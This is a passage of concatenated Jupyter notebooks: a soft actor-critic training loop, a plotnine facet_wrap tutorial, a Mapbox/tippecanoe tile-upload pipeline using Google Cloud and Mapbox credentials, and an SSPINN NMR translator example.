= Critic(state_dims, action_dim).to(device) target_critic_1 = Critic(state_dims, action_dim).to(device) target_critic_2 = Critic(state_dims, action_dim).to(device) actor = Actor(state_dims, action_dim).to(device) target_critic_1.load_state_dict(critic_1.state_dict()) target_critic_2.load_state_dict(critic_2.state_dict()) critic_optimizer_1 = optim.Adam(critic_1.parameters(), lr=learning_rate) critic_optimizer_2 = optim.Adam(critic_2.parameters(), lr=learning_rate) actor_optimizer = optim.Adam(actor.parameters(), lr=learning_rate) buffer = ReplayBuffer(state_dims, buffer_size, batch_size) # torch.prod() # Returns the product of all elements in the :attr:`input` tensor # 返回输入张量中所有元素的乘积(可指定维度) if automatic_entropy_tuning: # target_entropy = - torch.prod(torch.Tensor(env.action_space.shape).to(device)).item() # -4.0 target_entropy = - 1.0 log_alpha = torch.zeros(1, requires_grad=True, device=device) # tensor([0.], device='cuda:0', requires_grad=True) alpha = log_alpha.exp() alpha_optim = optim.Adam([log_alpha], lr=learning_rate) def sac_train(updates, steps_): global alpha for i in range(steps_): samples = buffer.sample() state, action, next_state = samples["state"], samples["action"], samples["next_state"] reward, done = samples["reward"], samples["done"] # update critic with torch.no_grad(): # EDIT 3 next_action, _, next_action_log_probs = actor(next_state) next_action_log_probs = next_action_log_probs.gather(1, next_action.long()) target_Q_1 = target_critic_1(next_state).gather(1, next_action.long()) target_Q_2 = target_critic_2(next_state).gather(1, next_action.long()) Q_target_next = torch.min(target_Q_1, target_Q_2) - alpha * next_action_log_probs next_q_value = reward + (1.0 - done) * gamma * Q_target_next Q_1 = critic_1(state).gather(1, action) Q_2 = critic_2(state).gather(1, action) critic_loss_1 = F.mse_loss(next_q_value, Q_1) critic_loss_2 = F.mse_loss(next_q_value, Q_2) critic_optimizer_1.zero_grad() critic_loss_1.backward() critic_optimizer_1.step() critic_optimizer_2.zero_grad() critic_loss_2.backward() critic_optimizer_2.step() # update actor # EDIT 5 if i % actor_update == 0: actions, action_probs, action_log_probs = actor(state) min_Q_value = torch.min(critic_1(state), critic_2(state)) actor_loss = (alpha * action_log_probs - min_Q_value) * action_probs actor_loss = torch.sum(actor_loss, dim=1, keepdim=True).mean() actor_optimizer.zero_grad() actor_loss.backward() actor_optimizer.step() # update entropy_tuning if automatic_entropy_tuning: # EDIT 4 action_log_probs = action_log_probs.gather(1, actions.long()) alpha_loss = - log_alpha * (action_log_probs.detach() + target_entropy) alpha_loss = alpha_loss.mean() alpha_optim.zero_grad() alpha_loss.backward() alpha_optim.step() alpha = log_alpha.exp() # update parameter for target_param, param in zip(target_critic_1.parameters(), critic_1.parameters()): target_param.data.copy_(target_param.data*(1.0-soft_tau) + param.data * soft_tau) for target_param, param in zip(target_critic_2.parameters(), critic_2.parameters()): target_param.data.copy_(target_param.data*(1.0-soft_tau) + param.data * soft_tau) writer.add_scalars("Loss/Critic", {"critic_1":critic_loss_1, "critic_2":critic_loss_2}, updates) writer.add_scalar("Loss/Actor", actor_loss, updates) writer.add_scalar("Loss/Alpha", alpha_loss, updates) updates, timesteps, done_time = 0, 0, 0 for episode in range(episodes): state = env.reset() episode_reward = 0 for i in count(): timesteps += 1 action = take_action(state, timesteps) next_state, reward, done, _ = env.step(action) buffer.store(state, action, next_state, reward, done) state = next_state episode_reward += reward if done: if len(buffer) > batch_size: sac_train(updates, i+1) updates += 1 writer.add_scalar("Episode_step", i, done_time) done_time += 1 break writer.add_scalar("Reward", episode_reward, episode) torch.save(actor, model_dir + "/actor_model.pth") ###Output _____no_output_____
demo_plot/plotnine-examples/examples/facet_wrap.ipynb
###Markdown Facet wrap`facet_wrap()` creates a collection of plots (facets), where each plot is differentiated by the faceting variable. These plots are wrapped into a certain number of columns or rows as specified by the user. ###Code mpg.head() ###Output _____no_output_____ ###Markdown Basic scatter plot: ###Code ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + labs(x='displacement', y='horsepower') ) ###Output _____no_output_____ ###Markdown Facet a discrete variable using `facet_wrap()`: ###Code ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class') + labs(x='displacement', y='horsepower') ) ###Output _____no_output_____ ###Markdown Control the number of rows and columns with the options `nrow` and `ncol`: ###Code # Selecting the number of columns to display ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class', ncol = 4 # change the number of columns ) + labs(x='displacement', y='horsepower') ) # Selecting the number of rows to display ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class', nrow = 4 # change the number of columns ) + labs(x='displacement', y='horsepower') ) ###Output _____no_output_____ ###Markdown To change the plot order of the facets, reorder the levels of the faceting variable in the data. ###Code # re-order categories mpg['class'] = mpg['class'].cat.reorder_categories(['pickup', 'suv','minivan','midsize','compact','subcompact','2seater']) # facet plot with reorded drv category ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class') + labs(x='displacement', y='horsepower') ) ###Output _____no_output_____ ###Markdown Ordinarily the facets are arranged horizontally (left-to-right from top to bottom). However if you would prefer a vertical layout (facets are arranged top-to-bottom, from left to right) use the `dir` option: ###Code # Facet plot with vertical layout ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class' , dir = 'v' # change to a vertical layout ) + labs(x='displacement', y='horsepower') ) ###Output _____no_output_____ ###Markdown You can choose if the scale of x- and y-axes are fixed or variable. Set the `scales` argument to `free-y`, `free_x` or `free` for a free scales on the y-axis, x-axis or both axes respectively. You may need to add spacing between the facets to ensure axis ticks and values are easy to read.A fixed scale is the default and does not need to be specified. ###Code # facet plot with free scales ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class' , scales = 'free_y' # set scales so y-scale varies with the data ) + theme(subplots_adjust={'wspace': 0.25}) # add spaceing between facets to make y-axis ticks visible + labs(x='displacement', y='horsepower') ) ###Output _____no_output_____ ###Markdown You can add additional information to your facet labels, by using the `labeller` argument within the `facet_wrap()` command. Below we use `labeller = 'label_both'` to include the column name in the facet label. ###Code # facet plot with labeller ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('class', labeller = 'label_both') + labs(x='displacement', y='horsepower') ) ###Output _____no_output_____ ###Markdown You can add two discrete variables to a facet: ###Code # add additional column for plotting exercise mpg["transmission"] = mpg['trans'].map(lambda x: "auto" if "auto" in x else "man" if "man" in x else "") # inspect new column transmission which identifies cars as having an automatic or manual transmission mpg.head() # facet plot with two variables on one facet ( ggplot(mpg, aes(x='displ', y='hwy')) + geom_point() + facet_wrap('~ class + transmission') # use ~ + to add additional faceting variables + labs(x='displacement', y='horsepower') ) ###Output _____no_output_____
prepare_boundaries_for_mapbox.ipynb
###Markdown Prepare data for the Soils Revealed projecthttps://github.com/Vizzuality/soils-revealed-data`Edward P. Morris (vizzuality.)` DescriptionThis notebook transforms vector boundaries into MapBox tiles format (MBTILES) using tippecanoe and uploads the resulting tiles to MapBox.```MIT LicenseCopyright (c) 2020 VizzualityPermission is hereby granted, free of charge, to any person obtaining a copyof this software and associated documentation files (the "Software"), to dealin the Software without restriction, including without limitation the rightsto use, copy, modify, merge, publish, distribute, sublicense, and/or sellcopies of the Software, and to permit persons to whom the Software isfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in allcopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS ORIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THEAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHERLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THESOFTWARE.``` Setup Linux dependencies ###Code %%bash # Install AWS CLI (for MapBox uploads) apt install --no-install-recommends -y -q awscli %%bash # Install tippecanoe (for MapBox mbtiles) apt install --no-install-recommends -q -y build-essential libsqlite3-dev zlib1g-dev make make install add-apt-repository -y ppa:ubuntu-toolchain-r/test apt update -q -y apt install --no-install-recommends -q -y g++-5 export CXX=g++-5 git clone https://github.com/mapbox/tippecanoe.git cd tippecanoe make -j make install !tippecanoe -h ###Output tippecanoe: invalid option -- 'h' Usage: tippecanoe [options] [file.json ...] Output tileset --output=output.mbtiles [--output-to-directory=...] [--force] [--allow-existing] Tileset description and attribution [--name=...] [--attribution=...] [--description=...] Input files and layer names [--layer=...] [--named-layer=...] Parallel processing of input [--read-parallel] Projection of input [--projection=...] Zoom levels [--maximum-zoom=...] [--minimum-zoom=...] [--extend-zooms-if-still-dropping] [--one-tile=...] Tile resolution [--full-detail=...] [--low-detail=...] [--minimum-detail=...] Filtering feature attributes [--exclude=...] [--include=...] [--exclude-all] Modifying feature attributes [--attribute-type=...] [--attribute-description=...] [--accumulate-attribute=...] [--empty-csv-columns-are-null] [--convert-stringified-ids-to-numbers] [--use-attribute-for-id=...] Filtering features by attributes [--feature-filter-file=...] [--feature-filter=...] Dropping a fixed fraction of features by zoom level [--drop-rate=...] [--base-zoom=...] [--drop-lines] [--drop-polygons] [--cluster-distance=...] Dropping or merging a fraction of features to keep under tile size limits [--drop-densest-as-needed] [--drop-fraction-as-needed] [--drop-smallest-as-needed] [--coalesce-densest-as-needed] [--coalesce-fraction-as-needed] [--coalesce-smallest-as-needed] [--force-feature-limit] [--cluster-densest-as-needed] Dropping tightly overlapping features [--gamma=...] [--increase-gamma-as-needed] Line and polygon simplification [--simplification=...] [--no-line-simplification] [--simplify-only-low-zooms] [--no-tiny-polygon-reduction] [--no-simplification-of-shared-nodes] Attempts to improve shared polygon boundaries [--detect-shared-borders] [--grid-low-zooms] Controlling clipping to tile boundaries [--buffer=...] [--no-clipping] [--no-duplication] Reordering features within each tile [--preserve-input-order] [--reorder] [--coalesce] [--reverse] [--hilbert] Adding calculated attributes [--calculate-feature-density] [--generate-ids] Trying to correct bad source geometry [--detect-longitude-wraparound] [--use-source-polygon-winding] [--reverse-source-polygon-winding] [--clip-bounding-box=...] Filtering tile contents [--prefilter=...] [--postfilter=...] Setting or disabling tile size limits [--maximum-tile-bytes=...] [--maximum-tile-features=...] [--no-feature-limit] [--no-tile-size-limit] [--no-tile-compression] [--no-tile-stats] [--tile-stats-attributes-limit=...] [--tile-stats-sample-values-limit=...] [--tile-stats-values-limit=...] Temporary storage [--temporary-directory=...] Progress indicator [--quiet] [--no-progress-indicator] [--progress-interval=...] [--version] ###Markdown Python packages ###Code %%bash # Install mapbox python package pip install mapbox !pip list ###Output Package Version ------------------------ --------------- absl-py 0.9.0 alabaster 0.7.12 albumentations 0.1.12 altair 4.1.0 asgiref 3.2.7 astor 0.8.1 astropy 4.0.1.post1 astunparse 1.6.3 atari-py 0.2.6 atomicwrites 1.3.0 attrs 19.3.0 audioread 2.1.8 autograd 1.3 awscli 1.14.44 Babel 2.8.0 backcall 0.1.0 beautifulsoup4 4.6.3 bleach 3.1.4 blis 0.4.1 bokeh 1.4.0 boto 2.49.0 boto3 1.12.39 botocore 1.15.39 Bottleneck 1.3.2 branca 0.4.0 bs4 0.0.1 CacheControl 0.12.6 cachetools 3.1.1 catalogue 1.0.0 certifi 2020.4.5.1 cffi 1.14.0 chainer 6.5.0 chardet 3.0.4 click 7.1.1 cloudpickle 1.3.0 cmake 3.12.0 cmdstanpy 0.4.0 colorama 0.3.7 colorlover 0.3.0 community 1.0.0b1 contextlib2 0.5.5 convertdate 2.2.0 coverage 3.7.1 coveralls 0.5 crcmod 1.7 cufflinks 0.17.3 cvxopt 1.2.4 cvxpy 1.0.31 cycler 0.10.0 cymem 2.0.3 Cython 0.29.16 daft 0.0.4 dask 2.12.0 dataclasses 0.7 datascience 0.10.6 decorator 4.4.2 defusedxml 0.6.0 descartes 1.1.0 dill 0.3.1.1 distributed 1.25.3 Django 3.0.5 dlib 19.18.0 docopt 0.6.2 docutils 0.15.2 dopamine-rl 1.0.5 earthengine-api 0.1.217 easydict 1.9 ecos 2.0.7.post1 editdistance 0.5.3 en-core-web-sm 2.2.5 entrypoints 0.3 ephem 3.7.7.1 et-xmlfile 1.0.1 fa2 0.3.5 fancyimpute 0.4.3 fastai 1.0.60 fastdtw 0.3.4 fastprogress 0.2.3 fastrlock 0.4 fbprophet 0.6 feather-format 0.4.0 featuretools 0.4.1 filelock 3.0.12 firebase-admin 4.0.1 fix-yahoo-finance 0.0.22 Flask 1.1.2 folium 0.8.3 fsspec 0.7.2 future 0.16.0 gast 0.3.3 GDAL 2.2.2 gdown 3.6.4 gensim 3.6.0 geographiclib 1.50 geopy 1.17.0 gin-config 0.3.0 glob2 0.7 google 2.0.3 google-api-core 1.16.0 google-api-python-client 1.7.12 google-auth 1.7.2 google-auth-httplib2 0.0.3 google-auth-oauthlib 0.4.1 google-cloud-bigquery 1.21.0 google-cloud-core 1.0.3 google-cloud-datastore 1.8.0 google-cloud-firestore 1.6.2 google-cloud-language 1.2.0 google-cloud-storage 1.18.1 google-cloud-translate 1.5.0 google-colab 1.0.0 google-pasta 0.2.0 google-resumable-media 0.4.1 googleapis-common-protos 1.51.0 googledrivedownloader 0.4 graphviz 0.10.1 grpcio 1.28.1 gspread 3.0.1 gspread-dataframe 3.0.5 gym 0.17.1 h5py 2.10.0 HeapDict 1.0.1 holidays 0.9.12 html5lib 1.0.1 httpimport 0.5.18 httplib2 0.17.2 httplib2shim 0.0.3 humanize 0.5.1 hyperopt 0.1.2 ideep4py 2.0.0.post3 idna 2.8 image 1.5.30 imageio 2.4.1 imagesize 1.2.0 imbalanced-learn 0.4.3 imblearn 0.0 imgaug 0.2.9 importlib-metadata 1.6.0 imutils 0.5.3 inflect 2.1.0 intel-openmp 2020.0.133 intervaltree 2.1.0 ipykernel 4.10.1 ipython 5.5.0 ipython-genutils 0.2.0 ipython-sql 0.3.9 ipywidgets 7.5.1 iso3166 1.0.1 itsdangerous 1.1.0 jax 0.1.62 jaxlib 0.1.42 jdcal 1.4.1 jedi 0.17.0 jieba 0.42.1 Jinja2 2.11.2 jmespath 0.9.5 joblib 0.14.1 jpeg4py 0.1.4 jsonschema 2.6.0 jupyter 1.0.0 jupyter-client 5.3.4 jupyter-console 5.2.0 jupyter-core 4.6.3 kaggle 1.5.6 kapre 0.1.3.1 Keras 2.3.1 Keras-Applications 1.0.8 Keras-Preprocessing 1.1.0 keras-vis 0.4.1 kiwisolver 1.2.0 knnimpute 0.1.0 librosa 0.6.3 lightgbm 2.2.3 llvmlite 0.31.0 lmdb 0.98 lucid 0.3.8 LunarCalendar 0.0.9 lxml 4.2.6 mapbox 0.18.0 Markdown 3.2.1 MarkupSafe 1.1.1 matplotlib 3.2.1 matplotlib-venn 0.11.5 missingno 0.4.2 mistune 0.8.4 mizani 0.6.0 mkl 2019.0 mlxtend 0.14.0 more-itertools 8.2.0 moviepy 0.2.3.5 mpmath 1.1.0 msgpack 1.0.0 multiprocess 0.70.9 multitasking 0.0.9 murmurhash 1.0.2 music21 5.5.0 natsort 5.5.0 nbconvert 5.6.1 nbformat 5.0.5 networkx 2.4 nibabel 3.0.2 nltk 3.2.5 notebook 5.2.2 np-utils 0.5.12.1 numba 0.48.0 numexpr 2.7.1 numpy 1.18.2 nvidia-ml-py3 7.352.0 oauth2client 4.1.3 oauthlib 3.1.0 okgrade 0.4.3 opencv-contrib-python 4.1.2.30 opencv-python 4.1.2.30 openpyxl 2.5.9 opt-einsum 3.2.0 osqp 0.6.1 packaging 20.3 palettable 3.3.0 pandas 1.0.3 pandas-datareader 0.8.1 pandas-gbq 0.11.0 pandas-profiling 1.4.1 pandocfilters 1.4.2 parso 0.7.0 pathlib 1.0.1 patsy 0.5.1 pexpect 4.8.0 pickleshare 0.7.5 Pillow 7.0.0 pip 19.3.1 pip-tools 4.5.1 plac 1.1.3 plotly 4.4.1 plotnine 0.6.0 pluggy 0.7.1 polyline 1.4.0 portpicker 1.3.1 prefetch-generator 1.0.1 preshed 3.0.2 prettytable 0.7.2 progressbar2 3.38.0 prometheus-client 0.7.1 promise 2.3 prompt-toolkit 1.0.18 protobuf 3.10.0 psutil 5.4.8 psycopg2 2.7.6.1 ptvsd 5.0.0a12 ptyprocess 0.6.0 py 1.8.1 pyarrow 0.14.1 pyasn1 0.4.8 pyasn1-modules 0.2.8 pycocotools 2.0.0 pycparser 2.20 pydata-google-auth 0.3.0 pydot 1.3.0 pydot-ng 2.0.0 pydotplus 2.0.2 PyDrive 1.3.1 pyemd 0.5.1 pyglet 1.5.0 Pygments 2.1.3 pygobject 3.26.1 pymc3 3.7 PyMeeus 0.3.7 pymongo 3.10.1 pymystem3 0.2.0 PyOpenGL 3.1.5 pyparsing 2.4.7 pyrsistent 0.16.0 pysndfile 1.3.8 PySocks 1.7.1 pystan 2.19.1.1 pytest 3.6.4 python-apt 1.6.5+ubuntu0.2 python-chess 0.23.11 python-dateutil 2.8.1 python-louvain 0.14 python-slugify 4.0.0 python-utils 2.4.0 pytz 2018.9 PyWavelets 1.1.1 PyYAML 3.13 pyzmq 19.0.0 qtconsole 4.7.2 QtPy 1.9.0 regex 2019.12.20 requests 2.21.0 requests-oauthlib 1.3.0 resampy 0.2.2 retrying 1.3.3 roman 2.0.0 rpy2 3.2.7 rsa 4.0 s3fs 0.4.2 s3transfer 0.3.3 scikit-image 0.16.2 scikit-learn 0.22.2.post1 scipy 1.4.1 screen-resolution-extra 0.0.0 scs 2.1.2 seaborn 0.10.0 Send2Trash 1.5.0 setuptools 46.1.3 setuptools-git 1.2 Shapely 1.7.0 simplegeneric 0.8.1 six 1.12.0 sklearn 0.0 sklearn-pandas 1.8.0 smart-open 1.11.1 snowballstemmer 2.0.0 sortedcontainers 2.1.0 spacy 2.2.4 Sphinx 1.8.5 sphinxcontrib-websupport 1.2.1 SQLAlchemy 1.3.16 sqlparse 0.3.1 srsly 1.0.2 statsmodels 0.10.2 sympy 1.1.1 tables 3.4.4 tabulate 0.8.7 tbb 2020.0.133 tblib 1.6.0 tensorboard 2.2.0 tensorboard-plugin-wit 1.6.0.post3 tensorboardcolab 0.0.22 tensorflow 2.2.0rc3 tensorflow-addons 0.8.3 tensorflow-datasets 2.1.0 tensorflow-estimator 2.2.0rc0 tensorflow-gcs-config 2.1.8 tensorflow-hub 0.8.0 tensorflow-metadata 0.21.2 tensorflow-privacy 0.2.2 tensorflow-probability 0.9.0 termcolor 1.1.0 terminado 0.8.3 testpath 0.4.4 text-unidecode 1.3 textblob 0.15.3 textgenrnn 1.4.1 Theano 1.0.4 thinc 7.4.0 toolz 0.10.0 torch 1.4.0 torchsummary 1.5.1 torchtext 0.3.1 torchvision 0.5.0 tornado 4.5.3 tqdm 4.38.0 traitlets 4.3.3 tweepy 3.6.0 typeguard 2.7.1 typing 3.6.6 typing-extensions 3.6.6 tzlocal 1.5.1 umap-learn 0.4.1 uritemplate 3.0.1 urllib3 1.24.3 vega-datasets 0.8.0 wasabi 0.6.0 wcwidth 0.1.9 webencodings 0.5.1 Werkzeug 1.0.1 wheel 0.34.2 widgetsnbextension 3.5.1 wordcloud 1.5.0 wrapt 1.12.1 xarray 0.15.1 xgboost 0.90 xkit 0.0.0 xlrd 1.1.0 xlwt 1.3.0 yellowbrick 0.9.1 zict 2.0.0 zipp 3.1.0 ###Markdown Authorisation Google cloud storageEither use user authorisation or a service account, save credentials to your drive or upload. ###Code # For auth WITHOUT service account #from google.colab import auth #auth.authenticate_user() # https://cloud.google.com/resource-manager/docs/creating-managing-projects #project_id = "soc-platform" #!gcloud config set project {project_id} # Mount drive from google.colab import drive drive.mount('/content/drive') # Copy GC credentials to home (place in your GDrive, and connect Drive) !cp "/content/drive/My Drive/soc-platform-6a9bf204638c.json" "/root/.soc-platform-6a9bf204638c.json" # Auth WITH service account !gcloud auth activate-service-account \ [email protected] \ --key-file=/root/.soc-platform-6a9bf204638c.json --project="soc-platform" # Test GC auth !gsutil ls "gs://vizz-data-transfer" ###Output gs://vizz-data-transfer/SOC_maps/ ###Markdown MapBoxCreate a JSON file and add it to your drive or upload:```{"MB_USER:"user-name", "MB_TOKEN":"token"}``` ###Code # Copy GC credentials to home (place in your GDrive, and connect Drive) !cp "/content/drive/My Drive/copernicus-forests-mapbox.json" "/root/.copernicus-forests-mapbox.json" # Set up Mapbox (S3) credentials as environmental variables import json import os # Set user and token as environment variables c = json.loads(open("/root/.copernicus-forests-mapbox.json").read()) os.environ['MB_USER'] = c['MB_USER'] os.environ['MB_TOKEN'] = c['MB_TOKEN'] # Make call to mapbox api and save return to file !curl -X POST https://api.mapbox.com/uploads/v1/${MB_USER}/credentials?access_token=${MB_TOKEN} > credentials.json r = json.loads(open("credentials.json").read()) #print(r) # Set credentials as environ variables os.environ['MB_BUCKET'] = r['bucket'] os.environ['MB_KEY'] = r['key'] os.environ['AWS_ACCESS_KEY_ID'] = r['accessKeyId'] os.environ['AWS_SECRET_ACCESS_KEY'] = r['secretAccessKey'] os.environ['AWS_SESSION_TOKEN'] = r['sessionToken'] ###Output % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 857 100 857 0 0 2158 0 --:--:-- --:--:-- --:--:-- 2158 ###Markdown Utils copy_gcs ###Code import os import subprocess def copy_gcs(source_list, dest_list, opts=""): """ Use gsutil to copy each corresponding item in source_list to dest_list """ for s, d in zip(source_list, dest_list): cmd = f"gsutil -m cp -r {opts} {s} {d}" print(f"Processing: {cmd}") r = subprocess.call(cmd, shell=True) if r == 0: print("Task created") else: print("Task failed") print("Finished copy") ###Output _____no_output_____ ###Markdown upload_to_mapbox ###Code # Upload task for mapbox import os from mapbox import Uploader def upload_to_mapbox(file_path, tileset_name): """ Given a local file path and a MapBox tileset name push to MapBox AWS S3 staging and create MapBox upload task """ username = os.getenv("MB_USER") my_token = os.getenv("MB_TOKEN") u = Uploader(access_token=my_token) # handles authentication tileset = f"{username}.{tileset_name}" # name your tileset job = u.upload(open(file_path, 'rb'), tileset) # upload happens here # job = u.create(url, tileset, name=tileset_name) # starts the tiling job status = job.status_code print(status) ###Output _____no_output_____ ###Markdown create_mbtiles ###Code import os import subprocess def create_mbtiles(source_path, dest_path, layer_name, opts="-zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel"): """ Use tippecanoe to to create a MBTILE at dest_path from source_path. layer_name is used for the name of the layer in the MBTILE. Regex file path (/*.geojson) is supported for source_path. """ cmd = f"tippecanoe -o {dest_path} -l {layer_name} {opts} {source_path}" print(f"Processing: {cmd}") r = subprocess.call(cmd, shell=True) if r == 0: print("Task created") else: print("Task failed") print("Finished processing") ###Output _____no_output_____ ###Markdown Process data Create MBTILES ###Code layer_name = "SWE_biovar_species" source_path = "'/content/drive/My Drive/copernicus-forests/SWE_zonal_biovar_ISEA-3-HEXAGON_grid.geojson'" dest_path = "'/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles'" create_mbtiles(source_path, dest_path, layer_name, opts="-zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel") ###Output Processing: tippecanoe -o '/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles' -l SWE_biovar_species -zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel '/content/drive/My Drive/copernicus-forests/SWE_zonal_biovar_ISEA-3-HEXAGON_grid.geojson' Task created Finished processing ###Markdown Upload to MapBox ###Code # Add to Mapbox import glob import os path = '/content/drive/My Drive/copernicus-forests/' files = [f for f in glob.glob(path + "**/*.mbtiles", recursive=True)] print(files) for f in files: print(f) upload_to_mapbox(f, os.path.splitext(os.path.basename(f))[0]) ###Output ['/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles'] /content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles 201
examples/TranslatorExample.ipynb
###Markdown SSPINN Neural Net Translator Let's take a look at our nn_translator function. This function takes the input file and parses it to get a tuple containing:1. a list of elements of size 10 concatonated with a list of peak areas and multiplicities of size 3,3402. a connectivity matrix of size 432 by 432So first we will import the nn_translator from sspinn. We also import os so that we can look at the input files: ###Code from sspinn.nn_translator import nn_translator as nnt import os ###Output _____no_output_____ ###Markdown This is what the input file for C15O2H22 would look like for a training file: ###Code fo = open('nn_translator_test.txt', 'r') line = fo.readline() print(line) while line != '': line = fo.readline() print(line) ###Output Empirical formula: C15O2H22 peakLocation peakArea peakMultiplicity 9.1 1 Q 10.9 1 Q 24.2 1 Q 26.6 1 q 27.4 1 T 33.0 1 t 39.0 1 T 44.1 1 S 46.2 1 D 72.7 1 d 121.6 1 D 125.6 1 S 138.1 1 s 165.9 1 s 200.1 1 S Connectivity Matrix C C C C C C C C C C C C C C C O O H H H H H H H H H H H H H H H H H H H H H H 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 2 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 2 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 